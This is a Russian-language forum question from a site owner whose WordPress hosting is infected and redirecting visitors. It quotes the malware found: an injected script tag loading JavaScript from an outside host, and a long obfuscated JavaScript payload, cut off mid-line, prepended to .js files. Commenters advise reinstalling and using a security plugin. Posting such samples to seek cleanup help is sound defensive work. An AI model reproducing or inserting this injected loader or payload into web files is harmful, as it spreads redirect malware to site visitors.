# Очистка заражённых файлов сайта от вредоносного кода

Tags: javascript, php, wordpress, консоль

У меня хостинг заражен вирусом и все сайты (4) перенаправляется на другие рекламные сайты. В начале всех файлах `index.php` появился такой код:

```
<script type='text/javascript' async src='https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000'></script>
```

А еще есть вот такие странные файлы - `Jwlsjd_woiqusjfx.php`,  `oihfoe09fposf.php`

Я удалил эти файлы и строки, но сайты все равно перенаправляется. А потом я обнаружал што и `.js` файлы тоже заражены. О начале всех `.js` файлах появился вот такой код:

```
var _0x6eea=["\x56\x79\x7A\x43\x6B\x63\x4B\x65\x77\x37\x67\x39\x64\x43\x6C\x36\x77\x70\x6E\x43\x6F\x63\x4F\x57\x51\x38\x4B\x57\x63\x57\x44\x44\x74\x47\x67\x63\x77\x70\x6B\x3D","\x4D\x73\x4B\x76\x77\x34\x72\x44\x6A\x4D\x4B\x6B\x59\x77\x37\x43\x69\x57\x6A\x43\x71\x38\x4F\x57\x56\x77\x3D\x3D","\x63\x38\x4B\x43\x77\x6F\x66\x43\x71\x63\x4F\x6B\x77\x71\x41\x7A\x77\x70\x76\x44\x73\x63\x4F\x64","\x45\x73\x4B\x4B\x42\x33\x63\x35\x53\x77\x3D\x3D","\x62\x57\x37\x43\x6E\x52\x2F\x44\x67\x73\x4B\x78\x45\x63\x4F\x72\x4A\x6D\x6A\x44\x76\x77\x37\x44\x75\x77\x3D\x3D","\x77\x70\x72\x43\x73\x63\x4F\x4D\x77\x71\x7A\x43\x69\x52\x70\x42\x42\x47\x6F\x3D","\x46\x44\x6A\x44\x73\x38\x4F\x6C\x77\x6F\x70\x65\x77\x72\x31\x5A\x46\x51\x3D\x3D","\x47\x43\x2F\x43\x6B\x4D\x4B\x31\x77\x37\x63\x73\x63\x43\x4E\x36\x77\x34\x58\x44\x75\x38\x4B\x30\x51\x63\x4F\x69\x5A\x6D\x62\x44\x69\x43\x6B\x46\x77\x6F\x6E\x44\x6A\x79\x78\x4B\x77\x36\x73\x6C\x77\x35\x64\x61\x77\x6F\x5A\x56\x77\x70\x45\x78\x77\x35\x37\x44\x68\x63\x4B\x79\x5A\x4D\x4F\x79\x77\x35\x48\x44\x6D\x4D\x4F\x6E\x54\x57\x49\x72\x52\x38\x4F\x2F\x4A\x63\x4F\x65\x45\x57\x58\x43\x75\x6D\x5A\x4C\x77\x71\x54\x44\x6F\x73\x4B\x59\x77\x70\x76\x44\x70\x4D\x4B\x58\x77\x72\x58\x44\x6C\x55\x38\x30\x77\x70\x2F\x44\x76\x43\x31\x46\x59\x44\x72\x43\x6E\x47\x55\x57\x4B\x38\x4B\x71\x77\x35\x67\x55\x64\x69\x70\x35\x77\x71\x50\x44\x6B\x4D\x4B\x2F\x77\x37\x34\x54\x77\x36\x4C\x44\x72\x78\x49\x55\x77\x34\x62\x44\x69\x46\x4C\x43\x6F\x63\x4F\x4D\x4D\x31\x4C\x44\x71\x52\x78\x4C\x49\x4D\x4F\x58\x77\x6F\x67\x6F\x77\x37\x56\x62\x5A\x63\x4B\x4F\x57\x38\x4B\x74\x4C\x63\x4F\x45\x77\x6F\x63\x54\x77\x36\x6B\x74\x77\x70\x78\x5A\x77\x70\x4A\x34\x58\x6C\x54\x43\x68\x54\x77\x42\x61\x73\x4B\x58\x77\x36\x54\x44\x67\x73\x4B\x75\x77\x34\x76\x43\x69\x47\x4D\x57\x63\x30\x30\x44\x59\x53\x70\x72\x77\x36\x4E\x35\x77\x72\x46\x47\x77\x6F\x68\x4E\x77\x6F\x6A\x43\x6F\x30\x46\x50\x77\x70\x4C\x43\x76\x63\x4F\x67\x45\x33\x73\x36\x77\x37\x4C\x44\x6A\x63\x4B\x33\x77\x71\x37\x43\x6F\x63\x4B\x65\x62\x6A\x6F\x2B\x64\x63\x4F\x4C\x77\x36\x74\x59\x49\x38\x4F\x32\x4A\x77\x6E\x44\x71\x43\x41\x54\x5A\x73\x4F\x78\x56\x4D\x4B\x57\x77\x35\x7A\x44\x72\x46\x4A\x48\x77\x35\x38\x69\x51\x47\x62\x44\x6E\x30\x51\x4B\x77\x34\x33\x44\x6D\x73\x4B\x77\x77\x37\x64\x6D\x61\x32\x44\x43\x6C\x38\x4F\x47\x77\x36\x42\x37\x58\x48\x76\x43\x6F\x73\x4B\x7A\x45\x79\x37\x44\x6C\x55\x49\x56\x77\x36\x42\x55\x51\x4D\x4F\x4F\x63\x73\x4B\x68\x77\x37\x6E\x44\x69\x45\x72\x44\x75\x6A\x6F\x55\x63\x6A\x7A\x44\x72\x7A\x51\x74\x77\x37\x72\x43\x75\x77\x6E\x44\x6F\x73\x4F\x5A\x59\x45\x4D\x78\x77\x6F\x77\x6F\x77\x72\x74\x2B\x77\x37\x37\x43\x73\x4D\x4B\x6C\x54\x55\x33\x44\x69\x7A\x6B\x44\x77\x35\x55\x77\x62\x73\x4B\x70\x4C\x73\x4F\x4B\x77\x35\x48\x43\x67\x38\x4F\x45\x56\x4D\x4F\x62\x55\x38\x4B\x70\x77\x36\x6E\x43\x72\x4D\x4B\x2B\x61\x6C\x4C\x44\x6F\x63\x4F\x57\x4C\x4D\x4B\x44\x77\x6F\x7A\x44\x6D\x63\x4B\x50\x77\x35\x33\x44\x69\x67\x6A\x43\x6A\x73\x4F\x42\x4F\x33\x48\x44\x74\x6B\x7A\x44\x75\x73\x4F\x71\x77\x70\x76\x44\x68\x6C\x59\x57\x53\x41\x50\x43\x6F\x38\x4F\x77\x77\x6F\x30\x68\x61\x78\x73\x74\x66\x6B\x7A\x43\x6C\x63\x4F\x6C\x77\x70\x46\x56\x5A\x54\x49\x63\x77\x34\x4D\x74\x51\x7A\x6B\x65\x77\x35\x2F\x44\x6A\x4D\x4B\x30\x41\x63\x4F\x77\x56\x63\x4F\x39\x77\x36\x63\x52\x57\x73\x4F\x68\x77\x37\x74\x61\x77\x6F\x37\x43\x73\x30\x50\x44\x74\x63\x4F\x52\x77\x72\x58\x44\x6B\x38\x4F\x61\x77\x72\x6A\x44\x6C\x41\x46\x69\x77\x36\x37\x44\x67\x73\x4B\x74\x4D\x63\x4B\x71\x49\x43\x4C\x43\x6F\x41\x62\x44\x6E\x4D\x4F\x76\x77\x72\x30\x37\x41\x73\x4F\x74\x53\x68\x63\x45\x77\x72\x52\x51\x43\x73\x4B\x47\x64\x38\x4B\x61\x45\x47\x67\x70\x45\x54\x78\x2F\x77\x6F\x6A\x44\x6B\x38\x4F\x50\x63\x78\x4D\x73\x77\x70\x30\x50\x77\x72\x54\x43\x70\x56\x44\x43\x6E\x73\x4B\x42\x77\x72\x6E\x44\x6D\x55\x6E\x44\x74\x63\x4F\x69\x77\x71\x45\x4F\x77\x6F\x50\x43\x70\x38\x4F\x59\x58\x38\x4B\x62\x47\x73\x4F\x44\x53\x51\x6F\x4A\x77\x36\x63\x63\x77\x72\x58\x43\x71\x4D\x4B\x73\x77\x70\x6A\x44\x6C\x4D\x4B\x4E\x59\x45\x58\x44\x69\x31\x48\x44\x74\x38\x4F\x6F\x77\x72\x70\x72\x77\x35\x37\x44\x74\x32\x77\x6F\x44\x63\x4B\x61\x77\x37\x62\x43\x73\x63\x4F\x71\x53\x4D\x4B\x55\x77\x71\x50\x43\x74\x73\x4F\x6C\x52\x4D\x4F\x43\x4F\x30\x35\x65\x77\x34\x76\x44\x6F\x4D\x4B\x46\x77\x35\x64\x44\x77\x70\x41\x73\x77\x6F\x74\x2B\x77\x34\x6F\x72\x47\x58\x6C\x73\x77\x70\x30\x71\x58\x63\x4F\x73\x4B\x4D\x4F\x6A\x77\x71\x58\x43\x6F\x4D\x4B\x72\x77\x36\x73\x30\x62\x63\x4F\x2B\x77\x36\x56\x6C\x55\x6E\x76\x43\x68\x73\x4F\x4D\x77\x36\x35\x50\x77\x36\x54\x44\x76\x78\x76\x43\x68\x43\x33\x44\x71\x4D\x4B\x7A\x77\x6F\x70\x56\x77\x36\x4C\x43\x74\x33\x74\x59\x64\x6A\x62\x44\x6E\x6D\x30\x65\x45\x53\x48\x44\x74\x73\x4B\x64\x77\x37\x59\x52\x77\x6F\x58\x43\x67\x56\x64\x53\x77\x34\x4C\x44\x74\x63\x4B\x35\x66\x73\x4B\x63\x77\x72\x6F\x55\x77\x70\x7A\x43\x76\x38\x4F\x32\x56\x31\x44\x44\x6D\x6B\x58\x44\x68\x52\x51\x4C\x47\x73\x4F\x6B\x77\x6F\x6C\x32\x4A\x63\x4B\x56\x77\x34\x56\x74\x77\x35\x66\x43\x67\x51\x6C\x6C\x44\x73\x4F\x67\x77\x72\x6A\x44\x74\x4D\x4F\x2B\x4B\x6D\x73\x36\x77\x35\x39\x6A\x77\x37\x37\x43\x68\x31\x44\x43\x73\x44\x52\x69\x77\x34\x33\x43\x6F\x33\x6E\x43\x73\x63\x4F\x59\x77\x36\x6C\x72\x77\x72\x70\x33\x58\x73\x4B\x36\x77\x72\x6F\x70\x77\x71\x6A\x43\x6D\x63\x4F\x30\x77\x70\x55\x4F\x63\x6C\x48\x44\x6B\x69\x76\x43\x75\x48\x4C\x44\x6B\x63\x4B\x72\x77\x35\x66\x44\x70\x45\x76\x44\x70\x32\x76\x43\x75\x38\x4B\x32\x4E\x67\x54\x44\x69\x38\x4F\x6A\x77\x37\x44\x44\x73\x63\x4F\x4F\x46\x73\x4B\x49\x77\x70\x62\x44\x6E\x58\x59\x37\x77\x6F\x38\x39\x52\x77\x44\x43\x69\x63\x4B\x58\x62\x47\x56\x6E\x49\x42\x62\x44\x6D\x4D\x4F\x45\x77\x35\x62\x43\x6B\x38\x4F\x4D\x52\x4D\x4F\x77\x64\x4D\x4B\x50\x77\x35\x54\x44\x6D\x32\x45\x31\x77\x72\x37\x44\x6A\x57\x37\x44\x74\x73\x4F\x32\x41\x63\x4F\x56\x77\x36\x67\x65\x55\x54\x77\x2F\x77\x34\x4D\x73\x77\x71\x6B\x2B\x77\x37\x48\x44\x75\x4D\x4B\x6E\x77\x72\x38\x31\x4E\x4D\x4B\x58\x77\x36\x33\x44\x74\x6A\x66\x43\x67\x73\x4B\x6B\x77\x37\x64\x39\x77\x6F\x50\x43\x6E\x56\x70\x42\x77\x36\x31\x6F\x42\x4D\x4B\x39\x65\x78\x63\x4D\x55\x73\x4F\x73\x4A\x73\x4B\x2B\x61\x38\x4B\x53\x55\x31\x42\x4A\x53\x4D\x4F\x74\x66\x48\x70\x51\x77\x70\x6A\x44\x6F\x73\x4F\x63\x77\x35\x6E\x44\x6F\x63\x4F\x52\x77\x35\x45\x6B\x77\x71\x4C\x44\x6F\x4D\x4F\x42\x77\x6F\x35\x35\x77\x34\x6A\x44\x69\x33\x34\x75\x63\x38\x4F\x43\x44\x48\x6A\x43\x68\x33\x6E\x44\x6A\x43\x48\x44\x67\x73\x4B\x52\x4B\x73\x4F\x6F\x77\x35\x76\x43\x68\x77\x78\x64\x77\x36\x4C\x43\x6A\x38\x4F\x5A\x57\x67\x49\x61\x77\x71\x44\x43\x68\x4D\x4F\x51\x66\x63\x4F\x6C\x77\x36\x50\x43\x75\x73\x4F\x74\x4B\x38\x4F\x2B\x77\x35\x6A\x44\x76\x38\x4B\x46\x65\x32\x59\x57\x57\x73\x4F\x36\x47\x33\x72\x44\x75\x41\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x55\x44\x50\x4D\x49\x55","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x58\x70\x44\x42\x61\x53","\x53\x4A\x4E\x65\x62\x4B","\x6C\x75\x42\x49\x48\x6B","\x30\x78\x30","\x43\x31\x25\x4A","\x30\x78\x31","\x49\x39\x5A\x77","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x30\x78\x32","\x36\x65\x21\x42","\x30\x78\x33","\x5A\x41\x54\x25","\x30\x78\x34","\x76\x57\x51\x5D","\x30\x78\x35","\x30\x78\x36","\x4B\x4D\x61\x25","\x30\x78\x37","\x6C\x6A\x70\x56"];var _0x69b4=[_0x6eea[0],_0x6eea[1],_0x6eea[2],_0x6eea[3],_0x6eea[4],_0x6eea[5],_0x6eea[6],_0x6eea[7],_0x6eea[8],_0x6eea[9],_0x6eea[10],_0x6eea[11],_0x6eea[12],_0x6eea[13],_0x6eea[14],_0x6eea[15],_0x6eea[16],_0x6eea[17],_0x6eea[18],_0x6eea[19],_0x6eea[20],_0x6eea[21],_0x6eea[22],_0x6eea[23],_0x6eea[24],_0x6eea[25],_0x6eea[26],_0x6eea[27],_0x6eea[28],_0x6eea[29],_0x6eea[30],_0x6eea[31],_0x6eea[32],_0x6eea[33],_0x6eea[34],_0x6eea[35],_0x6eea[36],_0x6eea[37],_0x6eea[38],_0x6eea[39],_0x6eea[40],_0x6eea[41],_0x6eea[42],_0x6eea[43],_0x6eea[44],_0x6eea[45],_0x6eea[46],_0x6eea[47],_0x6eea[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0x130bx3,_0x130bx4){var _0x130bx5=function(_0x130bx6){while(--_0x130bx6){_0x130bx3[_0x69b4[9]](_0x130bx3[_0x69b4[8]]())}};_0x130bx5(++_0x130bx4)}(_0x53ac,0x6b));var _0x4824=function(_0x130bx8,_0x130bx9){_0x130bx8= _0x130bx8- 0x0;var _0x130bxa=_0x53ac[_0x130bx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0x130bxb=function(){var _0x130bxc;try{_0x130bxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0x130bxc= window};return _0x130bxc};var _0x130bxd=_0x130bxb();var _0x130bxe=_0x69b4[14];_0x130bxd[_0x69b4[15]]|| (_0x130bxd[_0x69b4[15]]= function(_0x130bxf){var _0x130bx10=String(_0x130bxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0x130bx11=0x0,_0x130bx12,_0x130bx13,_0x130bx14=0x0,_0x130bx15=_0x69b4[16];_0x130bx13= _0x130bx10[_0x69b4[18]](_0x130bx14++);~_0x130bx13&& (_0x130bx12= _0x130bx11% 0x4?_0x130bx12* 0x40+ _0x130bx13:_0x130bx13,_0x130bx11++ % 0x4)?_0x130bx15+= String[_0x69b4[19]](0xff& _0x130bx12>> (-0x2* _0x130bx11 & 0x6)):0x0){_0x130bx13= _0x130bxe[_0x69b4[20]](_0x130bx13)};return _0x130bx15})}());var _0x130bx16=function(_0x130bx17,_0x130bx9){var _0x130bx18=[],_0x130bx19=0x0,_0x130bx1a,_0x130bx1b=_0x69b4[16],_0x130bx1c=_0x69b4[16];_0x130bx17= atob(_0x130bx17);for(var _0x130bx1d=0x0,_0x130bx1e=_0x130bx17[_0x69b4[21]];_0x130bx1d< _0x130bx1e;_0x130bx1d++){_0x130bx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0x130bx17[_0x69b4[26]](_0x130bx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0x130bx17= decodeURIComponent(_0x130bx1c);for(var _0x130bx1f=0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx18[_0x130bx1f]= _0x130bx1f};for(_0x130bx1f= 0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f]+ _0x130bx9[_0x69b4[26]](_0x130bx1f% _0x130bx9[_0x69b4[21]]))% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a};_0x130bx1f= 0x0;_0x130bx19= 0x0;for(var _0x130bx20=0x0;_0x130bx20< _0x130bx17[_0x69b4[21]];_0x130bx20++){_0x130bx1f= (_0x130bx1f+ 0x1)% 0x100;_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f])% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a;_0x130bx1b+= String[_0x69b4[19]](_0x130bx17[_0x69b4[26]](_0x130bx20)^ _0x130bx18[(_0x130bx18[_0x130bx1f]+ _0x130bx18[_0x130bx19])% 0x100])};return _0x130bx1b};_0x4824[_0x69b4[27]]= _0x130bx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !![]};var _0x130bx21=_0x4824[_0x69b4[28]][_0x130bx8];if(_0x130bx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !![]};_0x130bxa= _0x4824[_0x69b4[27]](_0x130bxa,_0x130bx9);_0x4824[_0x69b4[28]][_0x130bx8]= _0x130bxa}else {_0x130bxa= _0x130bx21};return _0x130bxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c8
```

Я удалил все `.js` файлы одного сайта, и после этого этот сайт начал работать (работал только админ панель) .Очевидно, что проблема только на этих файлах. Можно ли удалить эти вирусные строки из этих файлах с пoмощью `php scaner` или терминалом?

Comment: В моей практике я всегда переустанавливал WP и заново накатывал тему, потом экспорт/импорт контента. Это реально помогает....

Comment: Поддерживаю предыдущего комментатора. Полная переустановка, потом установка плагина WordFence. Вычистит вирусы при повторном появлении. Но если скрипты уже попали в базу, и выводятся вместе с контентом, вам поможет только помощь специалиста.

Comment: Боюсь это невозможно. Сайтов WP там  3, один из них другой CMS.  Я новичок в этом деле. Если бы можно было удалить эти строки с помощью терминала или php scaner , то было бы здорово.

Comment: Удалив строки из файлов, вы не гарантируйте удаление уязвимостей. Через некоторое время вирус вернётся и всё начнётся заново.

Comment: Возможный дубликат вопроса: [Хостинг заражен вирусом](https://ru.stackoverflow.com/questions/947400/%d0%a5%d0%be%d1%81%d1%82%d0%b8%d0%bd%d0%b3-%d0%b7%d0%b0%d1%80%d0%b0%d0%b6%d0%b5%d0%bd-%d0%b2%d0%b8%d1%80%d1%83%d1%81%d0%be%d0%bc). А в комментах там  давал исчерпывающий рецепт.